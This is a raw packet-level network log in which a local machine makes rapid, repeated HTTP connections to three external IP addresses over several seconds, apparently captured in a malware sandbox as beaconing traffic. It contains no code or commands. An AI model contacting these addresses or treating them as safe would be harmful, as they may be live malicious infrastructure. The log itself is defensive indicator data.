Aug 27, 2024 14:22:02.468523026 CEST	52560	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:02.473412037 CEST	80	52560	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:03.217571974 CEST	80	52560	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:03.217650890 CEST	52560	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:03.328756094 CEST	52560	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:03.329041958 CEST	52561	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:03.333884001 CEST	80	52560	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:03.333951950 CEST	52560	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:03.334095955 CEST	80	52561	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:03.334151983 CEST	52561	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:03.334256887 CEST	52561	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:03.339994907 CEST	80	52561	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:03.428781986 CEST	80	52559	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:03.428843021 CEST	52559	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:03.428909063 CEST	52559	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:03.436412096 CEST	80	52559	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:03.531932116 CEST	52562	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:03.538445950 CEST	80	52562	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:03.538551092 CEST	52562	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:03.538666010 CEST	52562	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:03.544583082 CEST	80	52562	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:04.167933941 CEST	52554	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:04.167941093 CEST	52562	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:04.168035030 CEST	52561	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:04.204459906 CEST	52564	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:04.204463959 CEST	52563	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:04.321343899 CEST	52565	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:04.911710024 CEST	80	52561	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:04.911772013 CEST	52561	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:04.911911964 CEST	80	52561	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:04.911947966 CEST	52561	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:04.912775993 CEST	80	52561	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:04.912821054 CEST	52561	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:04.913016081 CEST	80	52561	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:04.913045883 CEST	52561	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:04.914725065 CEST	80	52564	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:04.914741993 CEST	80	52563	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:04.914753914 CEST	80	52565	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:04.914793015 CEST	52564	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:04.914833069 CEST	52563	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:04.914958954 CEST	52564	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:04.914959908 CEST	52565	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:04.915004969 CEST	52563	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:04.915081024 CEST	52565	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:04.921124935 CEST	80	52564	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:04.921139002 CEST	80	52563	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:04.921202898 CEST	80	52565	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:05.656892061 CEST	80	52564	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:05.656961918 CEST	52564	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:05.767354012 CEST	52564	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:05.767669916 CEST	52566	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:05.772548914 CEST	80	52566	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:05.772629976 CEST	52566	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:05.772789955 CEST	52566	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:05.773011923 CEST	80	52564	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:05.773148060 CEST	52564	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:05.777740955 CEST	80	52566	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:06.492079020 CEST	80	52566	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:06.492155075 CEST	52566	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:06.494699955 CEST	52566	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:06.495058060 CEST	52567	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:06.500019073 CEST	80	52567	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:06.500107050 CEST	52567	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:06.500232935 CEST	52567	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:06.500247955 CEST	80	52566	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:06.500349998 CEST	52566	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:06.505884886 CEST	80	52567	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:06.519211054 CEST	80	52563	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:06.519309998 CEST	52563	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:06.519504070 CEST	52563	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:06.524317026 CEST	80	52563	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:06.634295940 CEST	52568	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:06.641572952 CEST	80	52568	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:06.641633034 CEST	52568	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:06.642400026 CEST	52568	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:06.647603035 CEST	80	52568	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:07.328073978 CEST	80	52567	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:07.328140020 CEST	52567	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:07.438209057 CEST	52567	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:07.438544989 CEST	52569	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:07.443639994 CEST	80	52569	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:07.443722010 CEST	52569	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:07.443856001 CEST	52569	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:07.443919897 CEST	80	52567	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:07.443964005 CEST	52567	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:07.448601007 CEST	80	52569	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:08.217334032 CEST	52568	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:08.217407942 CEST	52565	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:08.217674017 CEST	52569	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:08.220757961 CEST	52570	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:08.221134901 CEST	52571	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:08.221668959 CEST	52572	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:08.225579023 CEST	80	52570	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:08.225697041 CEST	52570	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:08.225903988 CEST	52570	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:08.225986958 CEST	80	52571	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:08.226478100 CEST	80	52572	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:08.226541042 CEST	52571	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:08.226542950 CEST	52572	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:08.226700068 CEST	52572	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:08.226851940 CEST	52571	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:08.230720997 CEST	80	52570	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:08.231478930 CEST	80	52572	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:08.231792927 CEST	80	52571	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:08.980874062 CEST	80	52572	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:08.980983019 CEST	52572	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:09.094521046 CEST	52572	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:09.094831944 CEST	52573	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:09.099673033 CEST	80	52573	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:09.099760056 CEST	52573	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:09.099963903 CEST	52573	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:09.104808092 CEST	80	52573	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:09.106734991 CEST	80	52572	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:09.106791019 CEST	52572	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:09.786900997 CEST	80	52573	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:09.787142038 CEST	52573	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:09.790016890 CEST	52573	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:09.790018082 CEST	52574	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:09.795070887 CEST	80	52574	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:09.795192003 CEST	52574	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:09.795329094 CEST	52574	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:09.795480013 CEST	80	52573	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:09.795639038 CEST	52573	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:09.803169966 CEST	80	52574	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:09.864089966 CEST	80	52571	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:09.864213943 CEST	52571	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:09.864300013 CEST	52571	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:09.869220972 CEST	80	52571	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:09.971606970 CEST	52575	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:09.976432085 CEST	80	52575	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:09.976530075 CEST	52575	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:09.976684093 CEST	52575	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:09.981683969 CEST	80	52575	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:10.496035099 CEST	80	52574	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:10.496184111 CEST	52574	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:10.612675905 CEST	52574	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:10.613151073 CEST	52577	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:10.618870020 CEST	80	52577	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:10.618938923 CEST	52577	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:10.619159937 CEST	52577	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:10.619679928 CEST	80	52574	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:10.619724989 CEST	52574	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:10.624068022 CEST	80	52577	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:11.298460960 CEST	80	52577	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:11.298516989 CEST	52577	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:11.302287102 CEST	52577	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:11.302850008 CEST	52578	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:11.307809114 CEST	80	52577	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:11.307857990 CEST	52577	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:11.307923079 CEST	80	52578	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:11.307975054 CEST	52578	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:11.308307886 CEST	52578	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:11.313091040 CEST	80	52578	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:11.600394011 CEST	80	52575	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:11.603768110 CEST	52575	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:11.603848934 CEST	52575	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:11.607892990 CEST	52579	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:11.608750105 CEST	80	52575	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:11.612941027 CEST	80	52579	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:11.615883112 CEST	52579	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:11.615971088 CEST	52579	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:11.620811939 CEST	80	52579	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:11.989311934 CEST	80	52578	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:11.989440918 CEST	52578	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:12.094580889 CEST	52578	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:12.094916105 CEST	52580	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:12.100301027 CEST	80	52580	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:12.101692915 CEST	52580	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:12.101799011 CEST	52580	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:12.106697083 CEST	80	52580	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:12.106820107 CEST	80	52578	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:12.109699011 CEST	52578	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:12.232790947 CEST	52580	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:12.232848883 CEST	52579	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:12.232848883 CEST	52570	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:12.239869118 CEST	52581	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:12.244852066 CEST	80	52581	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:12.247648001 CEST	52581	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:12.248682976 CEST	52581	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:12.258400917 CEST	80	52581	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:12.344842911 CEST	52583	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:12.344849110 CEST	52582	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:12.349770069 CEST	80	52582	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:12.349859953 CEST	52582	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:12.350027084 CEST	52582	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:12.350436926 CEST	80	52583	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:12.351701021 CEST	52583	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:12.351885080 CEST	52583	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:12.357988119 CEST	80	52582	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:12.359843969 CEST	80	52583	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:12.953392982 CEST	80	52581	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:12.953459024 CEST	52581	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:13.063563108 CEST	52581	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:13.063863039 CEST	52584	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:13.068739891 CEST	80	52584	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:13.068804979 CEST	80	52581	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:13.068816900 CEST	52584	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:13.068845987 CEST	52581	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:13.069016933 CEST	52584	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:13.073826075 CEST	80	52584	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:13.748775959 CEST	80	52584	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:13.751761913 CEST	52584	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:13.754520893 CEST	52585	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:13.754528046 CEST	52584	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:13.762710094 CEST	80	52585	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:13.763685942 CEST	52585	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:13.763801098 CEST	52585	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:13.763945103 CEST	80	52584	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:13.767719030 CEST	52584	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:13.772666931 CEST	80	52585	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:13.978456020 CEST	80	52582	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:13.978523970 CEST	52582	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:13.978691101 CEST	52582	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:13.981158018 CEST	52586	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:13.987437010 CEST	80	52582	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:13.987961054 CEST	80	52586	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:13.988023996 CEST	52586	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:13.988188982 CEST	52586	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:13.993361950 CEST	80	52586	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:14.469079018 CEST	80	52585	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:14.469156981 CEST	52585	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:14.579921007 CEST	52585	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:14.580250025 CEST	52587	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:14.585122108 CEST	80	52585	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:14.585151911 CEST	80	52587	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:14.585175991 CEST	52585	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:14.585232019 CEST	52587	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:14.585381031 CEST	52587	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:14.590656996 CEST	80	52587	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:15.282277107 CEST	80	52587	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:15.282335043 CEST	52587	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:15.285943985 CEST	52587	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:15.286299944 CEST	52588	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:15.291096926 CEST	80	52588	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:15.291162968 CEST	52588	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:15.291238070 CEST	80	52587	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:15.291282892 CEST	52587	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:15.291429996 CEST	52588	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:15.296206951 CEST	80	52588	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:15.580756903 CEST	80	52586	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:15.580908060 CEST	52586	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:15.583674908 CEST	52586	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:15.589050055 CEST	80	52586	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:15.688589096 CEST	52589	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:15.697017908 CEST	80	52589	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:15.699759960 CEST	52589	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:15.699759960 CEST	52589	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:15.704663038 CEST	80	52589	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:15.983932018 CEST	80	52588	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:15.984082937 CEST	52588	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:16.094166040 CEST	52588	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:16.097672939 CEST	52590	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:16.102871895 CEST	80	52590	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:16.103688002 CEST	52590	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:16.103950977 CEST	52590	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:16.108359098 CEST	80	52588	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:16.108506918 CEST	52588	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:16.112657070 CEST	80	52590	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:16.248528957 CEST	52589	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:16.248537064 CEST	52590	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:16.248537064 CEST	52583	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:16.253608942 CEST	52591	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:16.253988028 CEST	52593	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:16.253990889 CEST	52592	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:16.258925915 CEST	80	52591	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:16.258939981 CEST	80	52592	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:16.258949995 CEST	80	52593	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:16.259058952 CEST	52591	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:16.259063959 CEST	52592	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:16.259064913 CEST	52593	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:16.259299040 CEST	52593	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:16.259300947 CEST	52591	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:16.259403944 CEST	52592	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:16.264080048 CEST	80	52593	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:16.264101982 CEST	80	52591	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:16.264388084 CEST	80	52592	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:16.948051929 CEST	80	52591	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:16.948102951 CEST	52591	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:17.064428091 CEST	52591	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:17.064749956 CEST	52594	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:17.069633007 CEST	80	52594	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:17.069705963 CEST	52594	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:17.069861889 CEST	52594	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:17.070585966 CEST	80	52591	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:17.070632935 CEST	52591	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:17.074650049 CEST	80	52594	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:17.785783052 CEST	80	52594	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:17.792628050 CEST	52594	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:17.801610947 CEST	52594	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:17.806760073 CEST	80	52594	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:17.806801081 CEST	52595	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:17.813601971 CEST	52594	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:17.814307928 CEST	80	52595	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:17.819641113 CEST	52595	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:17.831643105 CEST	52595	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:17.836421967 CEST	80	52595	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:17.864974976 CEST	80	52592	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:17.873632908 CEST	52592	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:17.873632908 CEST	52592	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:17.887722969 CEST	80	52592	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:18.051429987 CEST	52596	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:18.057570934 CEST	80	52596	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:18.060210943 CEST	52596	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:18.060210943 CEST	52596	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:18.065716982 CEST	80	52596	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:18.536108971 CEST	80	52595	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:18.536694050 CEST	52595	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:18.641699076 CEST	52595	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:18.642029047 CEST	52597	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:18.777446985 CEST	80	52597	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:18.777462006 CEST	80	52595	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:18.777543068 CEST	52595	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:18.777544022 CEST	52597	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:18.777800083 CEST	52597	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:18.785254002 CEST	80	52597	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:19.474054098 CEST	80	52597	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:19.474153996 CEST	52597	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:19.476615906 CEST	52597	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:19.476882935 CEST	52598	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:19.481794119 CEST	80	52597	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:19.481890917 CEST	52597	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:19.481904030 CEST	80	52598	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:19.481961012 CEST	52598	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:19.482131004 CEST	52598	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:19.487087011 CEST	80	52598	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:19.680937052 CEST	80	52596	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:19.681044102 CEST	52596	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:19.681083918 CEST	52596	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:19.683648109 CEST	52599	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:19.686332941 CEST	80	52596	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:19.688554049 CEST	80	52599	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:19.688640118 CEST	52599	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:19.688889980 CEST	52599	80	192.168.2.6	185.209.162.226
